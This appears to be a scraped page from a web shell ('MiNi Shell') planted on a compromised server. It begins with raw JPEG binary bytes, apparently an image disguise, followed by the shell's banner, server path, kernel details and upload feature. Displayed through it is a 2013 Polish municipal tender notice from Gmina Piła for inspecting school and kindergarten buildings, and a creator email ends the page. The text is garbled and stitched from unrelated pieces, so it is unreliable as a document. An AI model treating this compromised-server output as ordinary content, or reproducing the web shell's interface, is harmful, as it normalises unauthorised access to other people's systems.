JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130213/22943-N-2013.html

<p class="kh_header"><b>Piła: Wykonanie w 2013 roku kontroli obiektów budowlanych rocznych i           półrocznych w placówkach oświatowych Gminy Piła.</b><br>
<b>Numer ogłoszenia: 22943 - 2013; data zamieszczenia: 13.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie w 2013 roku kontroli obiektów budowlanych rocznych i           półrocznych w placówkach oświatowych Gminy Piła..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1 Przedmiotem zamówienia jest wykonanie w 2013 roku kontroli obiektów budowlanych rocznych i półrocznych w placówkach oświatowych Gminy Piła polegających na sprawdzeniu stanu technicznego:                         
 a) elementów budynku, budowli i instalacji narażonych na szkodliwe wpływy atmosferyczne i  niszczące działania czynników występujących podczas użytkowania obiektu,
 b) instalacji i urządzeń służących ochronie środowiska,
c) instalacji gazowych oraz przewodów kominowych (dymowych, spalinowych i wentylacyjnych).
Kontrole muszą być prowadzone zgodnie z art. 62.1. pkt 1 oraz pkt 3, lit. a,b,c,  ustawy z dnia 7 lipca 1994 roku - Prawo Budowlane (Dz. U. Nr 89, poz. 414 ze zm. ) oraz wydanych na jej podstawie przepisów wykonawczych, przepisów szczegółowych i obowiązujących norm technicznych.
Kontrola prowadzona będzie we wszystkich budynkach znajdujących się na terenach  następujących placówek oświatowych  Gminy  Piła:
1. Publiczne Przedszkole Nr 1  ul. Witaszka 4, 
2. Publiczne Przedszkole Nr 2  ul. Roosevelta 38 A,
3. Publiczne Przedszkole Nr 3  ul. W. Pola 16,
4. Publiczne Przedszkole Nr 4, ul. Kusocińskiego 4,
5. Publiczne Przedszkole Nr 5, ul. Konopnickiej 7,
6. Publiczne Przedszkole Nr 6, ul. Żeleńskiego 15, (brak instalacji gazowej)
7. Publiczne Przedszkole Nr 7, im. Pszczółki Mai  ul. Wincentego Witosa 22 A, (brak instalacji gazowej) 
8. Publiczne Przedszkole Nr 8, ul. Boh. Stalingradu 23,
9. Publiczne Przedszkole Nr 11, ul. św. Jana. Bosko 2,
10. Publiczne Przedszkole Nr 12, ul. Reja 11,
11. Publiczne Przedszkole Nr 13, ul. Kraszewskiego 2,
12. Publiczne Przedszkole Nr 14, im. Wróbelka Elemelka  ul. Jana Brzechwy 10, 
13. Publiczne Przedszkole Nr 15,  ul. Grabowa 20,
14. Publiczne Przedszkole Nr 16   ul. Al. Powstańców Wlkp. 86A,
15. Publiczne Przedszkole Nr 17   im. Krasnala Hałabały  ul. Śniadeckich 3 A,
16. Publiczne Przedszkole Nr 18   im. Kubusia Puchatka ul. Trentowskiego 3,
17. Publiczne Przedszkole Nr 19   im. Misia Uszatka  ul. Kr. Jadwigi 20,
18. Żłobek Nr 1  ul. Grabowa 7,
19. Szkoła Podstawowa Nr 1 im. Stanisława Staszica   ul. Buczka 11
20. Szkoła Podstawowa Nr 2  im. Olimpijczyków Polskich   ul. Roosevelta 12,
21. Szkoła Podstawowa Nr 4 im. Mikołaja Kopernika   ul. Grabowa 18,
22. Szkoła Podstawowa Nr 5 im. Dzieci Polskich ul. al. Niepodległości 18,
23. Szkoła Podstawowa Nr 7  im. Adama Mickiewicza   ul. al. W. Polskiego 45
24. Szkoła Podstawowa Nr 12  z Oddziałami Integracyjnymi ul. Lelewela 140,
25. Zespół Szkół Nr 1   im. Jana Brzechwy  ul. Brzozowa 4, 
26. Zespół Szkół Nr 2  im. Królowej Jadwigi     ul. Kr. Jadwigi 2,
27. Zespół Szkół Nr 3  im. Lotników Polskich  ul. Żeromskiego 41,
28. Gimnazjum Nr 4 im. Paderewskiego Kujawska 18,
29. Gimnazjum Nr 5  im. Tadeusz Kościuszki ul. Bydgoska 23.  

1.2.  Wykonawca w pierwszej kolejności zobowiązany będzie wykona okresowe kontrole o której mowa w pkt 1.1. lit a,b,c  niniejszego zamówienia  w niżej  wymienionych placówkach oświatowych posiadających obiekty budowlane o powierzchni zabudowy przekraczającej 2.000,00 m2, dla których kontrola powinna być wykonana co najmniej dwa razy w roku, w terminach do dnia 31 maja  i do dnia 30 listopada w zakresie zgodnym z art.62 ust.1 pkt 3 Prawa budowlanego.
      1. Gimnazjum Nr 4 ul. Kujawska 18,
      2. Gimnazjum Nr 5 ul. Bydgoska 23,
      3. Zespół Szkół Nr 2 ul. Kr. Jadwigi 2,
      4. Zespół Szkół Nr 3 ul. Żeromskiego 41,
      5. Szkoła Podstawowa Nr 2 ul. Roosevelta 12,
      6. Szkoła Podstawowa Nr 12 ul. Lelewela 140.

1.3. Wykonawca wykonujący kontrolę będzie zobowiązany bezzwłocznie pisemnie zawiadomić właściwy organ o przeprowadzonej kontroli zgodnie art 62 ust.1 pkt 3  Prawa budowlanego, a potwierdzenie dostarczyć do Zamawiającego w ciągu 7 dni roboczych od daty zawiadomienia.
2. Termin realizacji całości zamówienia:  do 30 listopada 2013 r. 
   
2.1. Określenie szczegółowe terminów wykonywania kontroli.
        Wykonawca wykona w okresie:
a)  kwiecień - maj 2013 kontrolę w placówkach wymienionych w pkt 1.2,
b)  czerwiec - wrzesień 2013  kontrolę w placówkach wymienionych w pkt 1.1, pomijając placówki oświatowe wymienione w pkt 1.2, 
c)   październik -  listopad 2013  kontrolę w placówkach wymienionych w pkt 1.2

3.Warunki płatności:
3.1.Należność za wykonanie przedmiotu umowy Zamawiający ureguluje przelewem  w terminie 14 dni od daty otrzymania poprawnie wystawionej przez Wykonawcę faktury VAT wraz z wymaganymi załącznikami, o  których mowa w pkt 3.2

3.2.Podstawą do wystawienia faktury będą protokoły z okresowej kontroli wykonane oddzielnie dla:
 i b oraz  określonym w pkt 1.2,
b) kontroli okresowej  przewodów kominowych  określonej w pkt 1.1 lit. c  oraz  określonej w pkt 1.2.  Kontroli podlegają wszystkie przewody kominowe (wentylacyjne, dymowe, spalinowe). 
Wykonawca  sporządzi protokół z okresowej kontroli przewodów kominowych, który powinien zawierać m.in. zakres badania technicznego - kontroli przewodów kominowych, ustalenia dokonane w wyniku kontroli, wnioski, stwierdzenie przydatności lub nieprzydatności do dalszej eksploatacji przewodów kominowych, termin usunięcia ewentualnych nieprawidłowości, termin następnego przeglądu.
Wykonawca po stwierdzeniu niedrożności przewodów: dymowych, spalinowych i wentylacyjnych wykona udrożnienia tych przewodów w ramach wykonywanego zlecenia bez dodatkowych kosztów obciążających Zamawiającego.
c) kontroli okresowej instalacji gazowych określonej w pkt 1.1 lit. c  oraz  określonej w pkt 1.2,
Wykonawca  sporządzi protokół z okresowej kontroli instalacji gazowych, który powinien zawierać m.in. zakres badania technicznego instalacji gazowych, ustalenia dokonane w wyniku kontroli, wnioski, stwierdzenie przydatności lub nieprzydatności do dalszej bezpiecznej eksploatacji instalacji gazowych, termin usunięcia ewentualnych nieprawidłowości, termin następnego przeglądu. 
Wykonawca dostarczy Zamawiającemu protokoły w wersji papierowej  w dwóch egzemplarzach, protokoły należy również wykonać w wersji elektronicznej (jedna płyta CD winna zawierać wszystkie protokoły w formacie PDF). Wzór protokołów z kontroli rocznej stanu technicznego budynków musi być zgodny z wymogami aktualnych norm i przepisów, należy uzgodnić przed przystąpieniem do sprawdzania stanu budynków z Zamawiającym. Wraz z protokołami z wykonanych kontroli Wykonawca przedłoży: kserokopie stosownych   uprawnień osób realizujących przedmiot zamówienia.
3.4. Wynagrodzenie będzie płatne w następujący sposób:
Wykonawca ma prawo wystawić trzy faktury:
- pierwszą po wykonaniu okresowej kontroli w obiektach o powierzchni zabudowy przekraczającej 2.000,00 m2 wykonanej w terminie do 31 maja 2013 r. W zakresie określonym w pkt 1.2
- drugą po wykonaniu okresowej kontroli w zakresie określonym w pkt 1.1  pomijając placówki oświatowe wymienione w pkt 1.2
- trzecią po wykonaniu okresowej kontroli w obiektach o powierzchni zabudowy przekraczającej 2.000,00 m2 wykonanej w terminie do 30 listopada 2013 r. w zakresie określonym w pkt 1.2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.31.30.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował minimum: 
a) osobą posiadającą uprawnienia budowlane w specjalności konstrukcyjno - budowlanej,
b) osobą posiadającą uprawnienia  w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,
c) osobą posiadającą kwalifikacje wymagane przy wykonywaniu dozoru nad eksploatacją urządzeń, instalacji gazowych,
d) kontrolę stanu technicznego przewodów kominowych powinny przeprowadzić osoby:
1)  posiadające kwalifikacje mistrza w rzemiośle kominiarskim - w odniesieniu do przewodów dymowych oraz grawitacyjnych przewodów spalinowych i wentylacyjnych;
      lub 
2) posiadające uprawnienia budowlane odpowiedniej specjalności - w odniesieniu do przewodów kominowych, o których mowa w pkt 1, oraz do kominów przemysłowych, kominów wolno stojących oraz kominów lub przewodów kominowych, w których ciąg kominowy jest wymuszony pracą urządzeń mechanicznych.

Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać,że: ww warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo do reprezentowania w postępowaniu, ( w przypadku podmiotów występujących wspólnie) -    przygotowane zgodnie z zapisami części VII pkt. 4 SIWZ.
2)  Parafowany projekt  umowy .
3) Oświadczenie zgodnie z art. 22 ust.1</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2013 godzina 09:00, miejsce: siedziba Zamawiającego pok. 134  pietro I - Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com